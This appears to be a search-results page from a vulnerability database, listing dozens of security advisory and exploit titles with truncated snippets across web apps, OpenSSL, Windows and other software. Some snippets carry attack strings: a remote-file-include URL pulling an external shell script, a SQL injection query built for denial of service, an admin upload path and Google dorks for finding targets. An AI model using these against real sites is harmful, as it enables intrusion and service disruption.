47153 matches found
YaPiG thanks_comment.php Cross-Site Scripting Vulnerability
/ Kuon Armorize Security Team Kuon-at-Armorize.com YaPiG thankscomment.php Cross-Site Scripting Vulnerability Contact : Kuon-at-Armorize.com Link : www.Armorize.com / Armorize Technologies Security Advisory Advisory No: 20061001 Date: 2006/08/25 Affected Software: yapig 0.95b Vulnerability...
Multiple Sql injection and XSS in CartWIZ ASP Cart
Dcrab 's Security Advisory Hsc Security Group http://www.hackerscenter.com/ dP Security http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: Multiple Sql injection and XSS i...
[security bulletin] HPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04261644 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04261644 Version: 2 HPSBST03015 rev....
Apple Mac OS X / Mac EFI / OS X Server multiple security vulnerabilities
Code execution, information disclosure, restrictions bypass, multiple memory corruptions, multiple libraries vulnerabilities...
Precision (products.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Precision products.php?catid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.groupprecision.com/ Persian Gulf 4 Ever! Dork : "powered by Precision"...
aspProductCatalog Sql Injection
aspProductCatalog Sql Injection AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr - Hadi Kiamarsi Download :...
htmltonuke 2.0alpha for postnuke & PHP-Nuke(htmltonuke.php) Remote File Include Vulnerabilities
htmltonuke 2.0alpha for postnuke & PHP-Nukehtmltonuke.php Remote File Include Vulnerabilities script :http://www.desarrollonuke.org http://up.9q9q.net/up/index.php?f=ddAvVTUSs file : /htmltonuke.php Dork : "/nuke/htmltonuke.php" - "htmltonuke.php" Found by & Contact : Cold z3ro ,...
ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
Title : ASPNuke = 0.80 register.asp Remote SQL Injection Vulnerability Author : ajann S.Page : http://www.aspnuke.com D.Page : http://sourceforge.net/project/showfiles.php?groupid=92470 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ASP Nuke...
[SECURITY] [DSA-046-1] exuberant-ctags uses insecure temporary files
-----BEGIN PGP SIGNED MESSAGE----- - ------------------------------------------------------------------------ Debian Security Advisory DSA-046-1 [email protected] http://www.debian.org/security/ Wichert Akkerman April 15, 2001 -...
[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability
ADVISORY INFORMATION Title: Oracle E-Business Suite Cross-site Scripting Advisory ID: ERPSCAN-15-027 Advisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/ Date published: 20.10.2015 Vendors contacted: Oracle 2. VULNERABILITY...
[security bulletin] HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04239375 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04239375 Version: 1 HPSBMU02997 rev....
Local File Include Vulnerabilities in YaBB <= 2.1(all version)
Local File Include Vulnerabilities Problem: Local File Include Vulnerabilities Product: YaBB = 2.1all version Web page:http://www.yabbforum.com/ Credit:Maciej krasza Kukla @mail:[email protected] homepage:www.krasza.int.pl 1.Description "YaBB is a leading free forum software package that rivals an...
JMK's Picture Gallery admin login
dork: "JMK's Picture Gallery" and last path to add : admingallery.php3?action=add&upload=1 example:hhtp://www.site.com/path/.../admingallery.php3?action=add&upload=1 credits:AlpEren,tugr@...
[SA16009] Squito Gallery "photoroot" File Inclusion Vulnerability
---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...
[SePro Bugtraq] WBB - WoltLab Burning Board <= 2.3.1 - XSS Vulnerability (22.04.05)
SePro Bugtraq WBB - WoltLab Burning Board = 2.3.1 - XSS Vulnerability 22.04.05 Vendor: WoltLab URL: http://www.woltlab.de/ Version: = 2.3.1 Type: XSS Discovered by deluxe89 Description: -------------------------------- The WoltLab Burning Board is a high customisable forum software for every kind...
[USN-2786-1] PHP vulnerabilities
========================================================================== Ubuntu Security Notice USN-2786-1 October 28, 2015 php5 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
Microsoft Security Bulletin MS10-015 - Important Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165)
Microsoft Security Bulletin MS10-015 - Important Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege 977165 Published: February 09, 2010 Version: 1.0 General Information Executive Summary This security update resolves one publicly disclosed and one privately reported vulnerabilit...
iDefense Security Advisory 07.12.07: Red Hat Enterprise Linux init.d XFS Script chown Race Condition Vulnerability
Red Hat Enterprise Linux init.d XFS Script chown Race Condition Vulnerability iDefense Security Advisory 07.12.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 12, 2007 I. BACKGROUND XFS is the X Font Server, and is used to render fonts for the X Window System. "init.d" refers to the...
Flogr v2.5.6 & v2.3 - Cross Site Script Vulnerabilities
Title: ====== Flogr v2.5.6 & v2.3 - Cross Site Script Vulnerabilities Date: ===== 2012-07-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=656 VL-ID: ===== 656 Common Vulnerability Scoring System: ==================================== 2 Introduction: ============= Flog...
Linux mount / umount privilege escalation
Invalid order of setuid / setgid calls and unchecked return value...
[Full-disclosure] Advanced Guestbook remote XSS exploit
Advanced Guestbook 2.2 and 2.3.1 and possibly other versions remote XSS vulnerabilities By: Handrix handrixatmorxorg 16 December 2005 MorX security research team www.morx.org Description: Advanced Guestbook is a PHP-based guestbook script. index.php and comment.php scripts are vulnerable to XSS...
[security bulletin] HPSBHF03084 rev.1 HP PCs with UEFI Firmware, Execution of Arbitrary Code
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04393276 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04393276 Version: 1 HPSBHF03084 rev....
Cyberduck protection bypass
Invali FTP-SSL root ceritificates check...
Cups multiple security vulnerabilities
Code execution on URI handling, multiple DoS conditions...
Remote vulnerability in LCDproc 0.4
-----BEGIN PGP SIGNED MESSAGE----- ============================================================== === Title: Vulnerability in LCDproc === === Date: 20 April 2000 === === Author: Andrew Hobgood [email protected] === ============================================================== Note: The LCDproc...
IE 7 and Firefox Browsers Digest Authentication Request Splitting
Title IE 7 and Firefox Browsers Digest Authentication Request Splitting Systems Affected Internet Explorer 7.0.5730.11 FF 2.0.0.3 Severity Medium Vendor http://www.microsoft.com/ & http://www.mozilla.com Advisory http://www.wisec.it/vulns.php?id=11 Authors Stefano Wisec Di Paola...
[security bulletin] HPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, Performance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04236102 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04236102 Version: 1 HPSBMU02995 rev....
mpg123[v0.59r,v0.59s]: remote client-side heap corruption exploit.
did an audit of mpg123my mp3 player of choice, found a remotely exploitable bug in audio streaming servicehttpget.c; applies to v0.59r and v0.59spre, up to current as of writing this. the exploit comments explain how it works and how to find the memory addresses neededif not already a target valu...
def-2001-13: NTMail Web Services DoS
====================================================================== Defcom Labs Advisory def-2001-13 NTMail Web Services DoS Author: Peter Grьndl [email protected] Release Date: 2001-03-20 ====================================================================== ------------------------=Bri...
PALS Library System "show files" Vulnerability and remote command execution
Name: PALS Library System "show files" Vulnerability and remote command executiom. Date: 02.02.2001 About: This script is derived from an idea originated at St.Olaf College to provide a www interface to the PALS Library System. This idea was then worked on at Georgia State University. This versio...
CVE-2010-0188 Exploit Code
Exploit Title: Adobe Acrobat libtiff Remote Code Execution Date: 2010-03-12 Author: villy http://bugix-security.blogspot.com/ Software Link: http://adobe.com/ Version: Adobe Reader 9.x 9.3.1 Tested on: windows xpsp2 and xp3 CVE : CVE-2010-0188 Full python code on the link :...
Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit
?php / Geeklog =1.5.2 SECauthenticate/PHPAUTHUSER sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ credit goes to rgod, bug found more than a year ago working against PHP = 5.0 google dorks: "By Geeklog" "Creat...
artlinks Mambo Component <= Remote Include Vulnerability
artlinks Mambo Component = Remote Include Vulnerability Rish : High Class : Remote Script : artlinks Thanx : www.lezr.com/vb & All kuwait hackers d0rkiz : allinurl:"comartlinks" http://www.site.com/components/comartlinks/artlinks.dispnew.php?mosConfigabsolutepath=http://shell.txt by Dr.Jr7...
PHP security vulnerabilities
PHAR extension DoS...
Maian Guestbook v3.2 XSS Vulnerabilities
---------------------------------------------------------------- Script : Maian Guestbook v3.2 Type : XSS Vulnerabilities ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH...
[SAMBA-SECURITY] CVE-2007-2447: Remote Command Injection Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ========================================================== == == Subject: Remote Command Injection Vulnerability == CVE ID: CVE-2007-2447 == == Versions: Samba 3.0.0 - 3.0.25rc3 inclusive == == Summary: Unescaped user input parameters are passed == as...
Security Bulletin (MS00-029)
Microsoft Security Bulletin MS00-029 - -------------------------------------- Patch Available for "IP Fragment Reassembly" Vulnerability Originally Posted: May 19, 2000 Summary ======= Microsoft has released a patch that eliminates a security vulnerability in Microsoftr Windowsr 95, Windows 98,...
NEW VMSA-2014-0010 - VMware product updates address critical Bash security vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VMware Security Advisory Advisory ID: VMSA-2014-0010 Synopsis: VMware product updates address critical Bash security vulnerabilities Issue date: 2014-09-30 Updated on: 2014-09-30 Initial Advisory CVE numbers: CVE-2014-6271, CVE-2014-7169, CVE-2014-718...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Huawei HG default WEP/WPA generator
Hi, Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key from the MAC address. The following documents detail the process of developing a key generator for these devices. English: http://websec.ca/blog/view/mac2wepkeyhuawei Espao...
mvnForum 1.1 Cross Site Scripting
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 mvnForum Cross Site Scripting Vulnerability Original release date: 2008-04-27 Last revised: 2008-05-06 Latest version: http://users.own-hero.net/decoder/advisories/mvnforum-jsxss.txt Source: Christian Holler http://users.own-hero.net/decoder/ Systems...
MS07-012 Not Fixed
The MS07-012 patch that came out on Black Tuesday in Feb 2007 is not a complete solution to the problem. Title: MFC42u.dll Off-by-Two Overflow Date: 15 March 2007 Affected: Windows 2000, XP, 2003 those that were affected by the MS07-012 patch Reported by: Greg Sinclair gssincla...nnlsoftware.com...
PHPFanBase (protection.php) Remote File Include Vulnerability
--------------------------------------|| Viva Palestine ||----------------------------------------- --------------------------------------|| Free Saddam Hussien ||----------------------------------------- PHPFanBase protection.php Remote File Include Vulnerability Found By : CoLd Zero Wasem898...
Invision Gallery 2.0.7 SQL Injection Vulnerability
Invision Gallery 2.0.7 DOS attak can be performed index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN SELECT BENCHMARK10000000,BENCHMARK10000000,md5currentdate FROM ipbgalleryimages...
SEC Consult SA-20150514-0 :: Multiple vulnerabilities in Loxone Smart Home (part 2)
SEC Consult Vulnerability Lab Security Advisory 20150514-0 ======================================================================= title: Multiple vulnerabilities product: Loxone Smart Home vulnerable version: Firmware version 6.4.5.12 fixed version: 6.4.5.12 impact: Critical homepage:...
Oracle Critical Patch Update Advisory - October 2010
Oracle Critical Patch Update Advisory - October 2010 Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required because of interdependencies by those security patches. Critical Patch Updates are...
XSS vulnerability in JComments, Joomla
Vulnerability ID: HTB22368 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinjcommentsjoomla.html Product: JComments Vendor: JoomlaTune .com Vulnerable Version: 2.1.0.0 07/08/2009 and Probably Prior Versions Vendor Notification: 04 May 2010 Vulnerability Type: XSS Cross Site Scripting...
MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability
Mangobery-0.5.5 Found by kezzap66345 Script Page:http://mangobery.sourceforge.net/ Demo Site:http://mangobery.beryllium.ca/ Script Download:http://sourceforge.net/project/showfiles.php?groupid=63834&packageid=60858 Dork:http://www.google.com.tr/search?hl=tr&q=22MangoBery+1.0+Alpha22&meta= ERROR1:...
IdeaBox: Remote Command Execution
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: IdeaBox: Remote Command Execution product: IdeaBox 1.0 vendor: http://ideabox.phpoutsourcing.com risk: high date: 04/25/2k3 discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/022.en.txt http://f0kp.iplus.ru/bz/022.ru.tx...
ZDI-11-242: Apple Safari Rendering Object Body Detachment Remote Code Execution Vulnerability
ZDI-11-242: Apple Safari Rendering Object Body Detachment Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-242 July 27, 2011 -- CVE ID: CVE-2011-0255 -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- Affected Vendors: Apple -- Affected Products: Apple Safari --...